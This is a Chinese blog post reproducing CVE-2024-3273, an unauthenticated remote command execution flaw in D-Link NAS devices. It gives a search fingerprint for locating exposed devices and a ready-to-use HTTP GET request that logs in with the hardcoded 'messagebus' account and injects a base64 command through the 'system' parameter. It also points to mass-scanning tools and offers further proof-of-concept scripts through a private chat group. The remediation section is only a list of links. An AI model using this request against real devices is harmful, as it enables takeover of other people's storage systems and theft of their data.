【漏洞复现】D-Link NAS 未授权RCE漏洞(CVE-2024-3273)

于 2024-07-02 20:52:23 发布
阅读量354 收藏 4
点赞数 8
分类专栏: 漏洞复现篇 文章标签: D-Link RCE
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60571842/article/details/140136109
版权

0x01 产品简介

D-Link 网络存储 (NAS)是中国友讯(D-link)公司的一款统一服务路由器。

0x02 漏洞概述

D-Link NAS nas_sharing.cgi接口存在命令执行漏洞,该漏洞存在于“/cgi-bin/nas_sharing.cgi”脚本中,影响其 HTTP GET 请求处理程序组件。漏洞成因是通过硬编码帐户(用户名:“messagebus”和空密码)造成的后门以及通过“system”参数的命令注入问题。未经身份验证的攻击者可利用此漏洞获取服务器权限。

0x03 搜索引擎

"Text:In order to access the ShareCenter, please make sure you are using a recent browser(IE 7+, Firefox 3+, Safari 4+, Chrome 3+, Opera 10+)"

在这里插入图片描述

0x04 漏洞复现

GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=base64编码的命令 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)
Accept-Encoding: identity
Accept: */*
Connection: keep-alive

在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

0x06 修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://buaq.net/go-232770.html
https://github.com/adhikara13/CVE-2024-3273
https://www.trustwave.com/en-us/resources/security-resources/security-advisories

SuperherRo
关注
  • 8
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
D-Link NAS 授权RCE漏洞(CVE-2024-3273)
0xSec
04-09 947
D-Link NAS nas_sharing.cgi接口存在命令执行漏洞,该漏洞存在于“/cgi-bin/nas_sharing.cgi”脚本中,影响其 HTTP GET 请求处理程序组件。漏洞成因是通过硬编码帐户(用户名:“messagebus”和空密码)造成的后门以及通过“system”参数的命令注入问题。经身份验证的攻击者可利用此漏洞获取服务器权限。
CVE-2019-0232 Tomcat RCE 远程命令执行漏洞 环境
04-18
本附件是对CVE-2019-0232 Tomcat RCE 远程命令执行漏洞环境。 将文件下载到本地,直接运行tomcat 启动服务器,地址栏输入 http://localhost:8080/cgi-bin/hello.bat?c:/windows/system32/net user 即可看到漏洞效果,请勿非法使用,仅供学习研究
[漏洞]D-Link授权RCE漏洞(CVE-2024-3273)
KKleeeaa的博客
04-11 611
声明:亲爱的读者,我们诚挚地提醒您,Aniya网络安全的技术文章仅供个人研究学习参考。任何因传播或利用本实验室提供的信息而造成的直接或间接后果及损失,均由使用者自行承担责任。如有侵权,请立即告知,我们将立即删除并致歉。D-Link nas_sharing.cgi接口存在命令执行漏洞,该漏洞存在于“/cgi-bin/nas_sharing.cgi”脚本中,漏洞成因是通过硬编码帐户造成的后门以及通过“system”参数的命令注入问题。经身份验证的攻击者可利用此漏洞获取服务器权限。0x02FOFA测绘。
向日葵RCE漏洞(CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞(CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
CVE-2021-22192 靶场: 授权用户 RCE 漏洞.zip
01-16
在靶场中,安全专业人员可以模拟攻击者的行为,发系统和应用的漏洞,并进行渗透测试,从而及时修和改进防御机制。同时,这也为防御方提供了锻炼机会,通过对抗攻击提高防御能力。 靶场的搭建还促进了团队协作与...
CVE-2021-22192:CVE-2021-22192靶场:授权用户RCE漏洞
03-30
CVE-2021-22192 CVE-2021-22192靶场:授权用户RCE漏洞0x10靶场环境0x20目录结构CVE-2021-22192├── README.md ............... [此 README 说明]├── imgs .................... [辅助 README 说明的图片]├─...
远程执行代码漏洞(CVE-2018-0886)漏洞
08-21
远程执行代码漏洞(Remote Code Execution,RCE)是网络安全领域的一个重要话题,它指的是攻击者利用软件中的漏洞,在经用户授权的情况下,能够在目标系统上执行任意代码。在2018年,一个特别严重的RCE漏洞——CVE...
1203GMT-VB一种N-Channel沟道DFN8(5X6)封装MOS管
07-20
1203GMT-VB;Package:DFN8(5X6);Configuration:Single-N-Channel;VDS:30V;VGS:20(±V);Vth:1.7V;RDS(ON)=9mΩ@VGS=4.5V;RDS(ON)=7mΩ@VGS=10V;ID:80A;Technology:Trench;
Solid Edge 2024是顶级的3D建模程序,用于生成、建模和规划出色的3D模型
07-20
注意:文件为BT文件。Solid Edge 2024是顶级的3D建模程序,用于生成、建模和规划出色的3D模型。它是一个可靠的工具,使用户能够在流畅的工作环境中创建各种杂和详细的设计,并非常注重细节。它是一套全面且功能齐全的工具集,为专业人士提供了他们进行高效建模和零件制造所需的所有详细信息。这个优秀的应用程序允许你进行快速、灵活的设计修改,强大的组件管理,以及轻松整合多CAD数据。它还提供改进的结构和热模拟,包括快速热移动。此外,它可以直接用于杂组件的布局,如电线、梁、传输线等项目。它允许专业人士在同一个协作设计平台上处理并发和传统的结构组件。你也可以下载Altair SimSolid 2024。
鲍威尔法C语言鲍威尔法C语言
最新发布
07-20
c语言,鲍威尔法C语言
java基于ssm+vue安全教育平台系统源码 带毕业论文
07-20
【资源说明】 1、开发环境:ssm框架;内含Mysql数据库;VUE技术 2、该资源包括项目的全部源码,下载可以直接使用! 3、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,作为参考资料学习借鉴。 4、本资源作为“参考资料”如果需要实其他功能,需要能看懂代码,并且热爱钻研,自行调试。
管理系统项目源码资源.docx
07-20
以下是一些推荐的管理系统项目源码资源: 1. **Teamlinker** - 一款集成多功能模块的团队协作平台,包括项目、Wiki、日历、会议、聊天和网盘六个功能模块,实无缝整合,提升团队协作效率 。 2. **WookTeam** - 轻量级的开源在线团队协作工具,提供各类文档协作工具、在线思维导图、在线流程图、项目管理、任务分发、即时IM,知识库管理等工具 。 3. **唛盟企业级研发管理系统** - 简称唛盟xm,以研发管理为核心,涵盖项目规划、需求管理、开发迭代、版本控制、缺陷跟踪、测试管理、工时管理、效能分析等环节,实全过程、全方位的研发管理 。 4. **DooTask** - 开源在线项目任务管理工具,提供各类文档协作工具、在线思维导图、在线流程图、项目管理、任务分发、即时IM,文件管理等工具;同时消息功能使用非对称加密技术让你的沟通更安全 。 5. **Teamvision** - 项目管理包含了任务、提测、Bug管理,统计分析等功能,支持多成员协作,并且深度集成了持续集成(CI),支持每日构建,自动化测试,一键部署等功能 。 6. **
大数据技术分享 将Excel资料汇入PowerDesigner 共12页.pdf
07-20
大数据技术分享 将Excel资料汇入PowerDesigner 共12页.pdf
数据结构与算法基础课程 C语言C++程序语言设计教程 4_1串 共18页.pptx
07-20
【课程大纲】 1_0 课程简介 共7页.pptx 2_1绪论 共32页.pptx 2_2线性表-顺序表 共12页.pptx 2_3线性表-链表 共43页.pptx 3_1栈和队列 共29页.pptx 3_2递归和非递归 共22页.pptx 4_1串 共18页.pptx 5_1 数组 共19页.pptx 6_1二叉树 共19页.pptx 6_2森林和哈夫曼树 共15页.pptx 7_1 图(存储、遍历、连通) 共49页.pptx 7_2图(拓扑排序、关键路径、最短路径) 共52页.pptx 8_1集合与查找(静态查找、哈希、二叉排序树、平衡二叉树) 共28页.pptx 8_2集合与查找(B-树) 共12页.pptx 9内排序 共25页.pptx
12CN10L-VB TO251一种N-Channel沟道TO251封装MOS管
07-20
12CN10L-VB TO251;Package:TO251;Configuration:Single-N-Channel;VDS:100V;VGS:20(±V);Vth:1.8V;RDS(ON)=12.5mΩ@VGS=10V;ID:65A;Technology:Trench;
03-数据类型.md
07-20
03-数据类型
物联网工程_基于WIFI的电梯人员信息识别与安全环境检测反馈系统设计.docx
07-20
物联网工程_基于WIFI的电梯人员信息识别与安全环境检测反馈系统设计
Caché-高性能对象关系型数据库.pdf
07-20
本文对Caché对象关系库的概念、架构、访问、工具和状进行了介绍,供各位同学参考研究。
致远m3-server反序列化rce漏洞
12-22
致远m3-server存在反序列化RCE漏洞,攻击者可以利用此漏洞在远程服务器上执行恶意代码。为了这个漏洞,我们可以按照以下步骤进行: 1. 确认漏洞版本:首先需要确定目标服务器上的致远m3-server版本是否存在漏洞。可以通过查看官方公告或漏洞报告来确认。 2. 搭建测试环境:在本地搭建一个与目标服务器相似的测试环境,可以使用虚拟机或Docker等工具来模拟目标服务器环境。 3. 准备利用工具:准备一个适用于该漏洞的利用工具,例如ysoserial等,用于构造恶意的反序列化payload。 4. 发起攻击:利用准备好的利用工具构造恶意payload,然后向目标服务器发送恶意请求,触发漏洞并执行恶意代码。 5. 验证漏洞利用:在攻击成功后,可以通过查看服务器日志或执行一些系统命令来验证是否成功执行了恶意代码。 6. 报告漏洞:一旦成功漏洞,需要及时向致远m3-server的官方或相关安全机构报告漏洞细节,以便及时修和防范。 总的来说,致远m3-server反序列化RCE漏洞需要仔细分析漏洞利用的过程,同时要遵守相关法律法规,不得在授权的情况下攻击他人系统。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SuperherRo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值